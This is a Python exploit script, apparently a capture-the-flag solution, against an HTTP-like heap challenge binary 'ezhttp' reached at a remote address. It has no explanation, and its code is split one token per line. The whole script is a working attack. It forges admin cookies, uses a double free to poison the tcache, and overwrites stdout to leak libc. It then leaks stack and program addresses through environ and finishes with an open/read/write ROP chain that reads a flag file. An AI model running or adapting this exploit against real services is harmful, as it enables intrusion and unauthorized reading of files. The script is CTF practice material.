from
PwnContext
import
*
try
:
from
IPython
import
embed as ipy
except
ImportError:
print
(
'IPython not installed.'
)
if
__name__
=
=
'__main__'
:
context.terminal
=
[
'tmux'
,
'splitw'
,
'-h'
]
context.log_level
=
'debug'
s
=
lambda
data :ctx.send(
str
(data))
sa
=
lambda
delim,data :ctx.sendafter(
str
(delim),
str
(data))
sl
=
lambda
data :ctx.sendline(
str
(data))
sla
=
lambda
delim,data :ctx.sendlineafter(
str
(delim),
str
(data))
r
=
lambda
numb
=
4096
:ctx.recv(numb)
ru
=
lambda
delims, drop
=
True
:ctx.recvuntil(delims, drop)
irt
=
lambda
:ctx.interactive()
rs
=
lambda
*
args,
*
*
kwargs :ctx.start(
*
args,
*
*
kwargs)
dbg
=
lambda
gs
=
'',
*
*
kwargs :ctx.debug(gdbscript
=
gs,
*
*
kwargs)
uu32
=
lambda
data :u32(data.ljust(
4
,
'\0'
))
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
ctx.binary
=
'./ezhttp.bak'
ctx.remote_libc
=
'./libc-2.27.so'
ctx.remote
=
(
'183.129.189.61'
,
56002
)
ctx.debug_remote_libc
=
True
ctx.symbols
=
{
'node'
:
0x203120
}
ctx.breakpoints
=
[
0x18CD
,
0x1753
]
ctx.debug()
def
lg(s,addr):
print
(
'\033[1;31;40m%20s-->0x%x\033[0m'
%
(s,addr))
def
add(idx, content):
payload
=
'POST /create '
payload
+
=
'Cookie: user=admin '
payload
+
=
'token: '
+
'\x01\x0d'
payload
+
=
'\r\n\r\n'
payload
+
=
'content='
+
content
sa(
'me'
,payload)
def
delete(idx):
payload
=
'POST /del '
payload
+
=
'Cookie: user=admin '
payload
+
=
'token: '
+
'\x01\x0d'
payload
+
=
'\r\n\r\n'
payload
+
=
'index='
+
str
(idx)
sa(
'me'
,payload)
def
edit(idx,content):
payload
=
'POST /edit '
payload
+
=
'Cookie: user=admin '
payload
+
=
'token: '
+
'1\r'
payload
+
=
'\r\n\r\n'
payload
+
=
'index='
+
str
(idx)
+
"&"
+
'content='
+
content
sa(
'me'
,payload)
while
True
:
try
:
rs()
context.log_level
=
'info'
add(
0
,
'a'
*
0x10
)
ru(
'Your gift: '
)
heap_base
=
int
(ru(
'\"'
,drop
=
True
),
16
)
-
0x260
lg(
'heap_base'
,heap_base)
delete(
0
)
delete(
0
)
payload
=
'\x05'
*
0x8
+
'\xff'
*
6
+
'\x05'
*
2
add(
1
,p64(heap_base
+
0x10
))
add(
2
,
'a'
*
0x8
)
add(
3
,payload)
add(
4
,
'a'
*
0xa0
)
add(
5
,
'a'
*
0xf0
)
delete(
4
)
add(
6
,
'\x60\xb7'
)
delete(
1
)
edit(
2
,p64(heap_base
+
0x280
)[:
6
]
+
'\n'
)
add(
7
,
'a'
*
0x6
)
add(
8
,
'\x80\xb7'
)
add(
9
,p64(
0xfbad3887
))
delete(
7
)
edit(
2
,p64(heap_base
+
0x280
)[:
6
]
+
'\n'
)
add(
10
,
'a'
*
6
)
add(
11
,
'\x80\xb7'
)
add(
12
,
'a'
*
0x10
)
edit(
12
,
'\x80\n'
)
ru(
'========\n'
)
libc_base
=
uu64(r(
8
))
-
0x3ec780
lg(
'libc'
,libc_base)
aim
=
libc_base
+
0x619f60
environ
=
libc_base
+
0x3ee098
lg(
'environ'
,environ)
payload
=
p64(environ)
+
p64(environ
+
8
)[:
6
]
+
'\n'
edit(
12
,payload)
ru(
'========\n'
)
stack
=
uu64(r(
8
))
aim
=
stack
-
0x1940
lg(
'stack'
,stack)
payload
=
p64(aim)
+
p64(aim
+
8
)[:
6
]
+
'\n'
edit(
12
,payload)
ru(
'========\n'
)
prog
=
uu64(r(
8
))
-
0x1afc
lg(
'prog'
,prog)
node
=
prog
+
0x203120
delete(
5
)
delete(
5
)
add(
13
,
'a'
*
0xf0
)
edit(
13
,p64(node)
+
p64(
0
)
+
'\n'
)
add(
14
,
'a'
*
0xf0
)
edit(
2
,
'./flag\0\n'
)
payload
=
p64(aim)
+
p64(
0xf0
)
+
p64(heap_base
+
0x260
)
+
p64(
0x10
)
+
'\n'
add(
15
,
'a'
*
0xf0
)
edit(
15
,payload)
pop_rdi
=
libc_base
+
0x000000000002155f
pop_rsi
=
libc_base
+
0x0000000000023e8a
pop_rdx
=
libc_base
+
0x0000000000001b96
open1
=
libc_base
+
0x10fd50
read
=
libc_base
+
0x110180
write
=
libc_base
+
0x110250
flag_addr
=
heap_base
+
0x260
heap_addr
=
heap_base
+
0x1000
payload
=
p64(pop_rdi)
+
p64(flag_addr)
+
p64(pop_rsi)
+
p64(
0
)
+
p64(open1)
payload
+
=
p64(pop_rdi)
+
p64(
4
)
+
p64(pop_rsi)
+
p64(heap_addr)
+
p64(pop_rdx)
+
p64(
0x30
)
+
p64(read)
payload
+
=
p64(pop_rdi)
+
p64(
1
)
+
p64(pop_rsi)
+
p64(heap_addr)
+
p64(pop_rdx)
+
p64(
0x30
)
+
p64(write)
payload
+
=
p64(
0
)
+
'\n'
edit(
0
,payload)
irt()
except
KeyboardInterrupt:
break
except
EOFError:
continue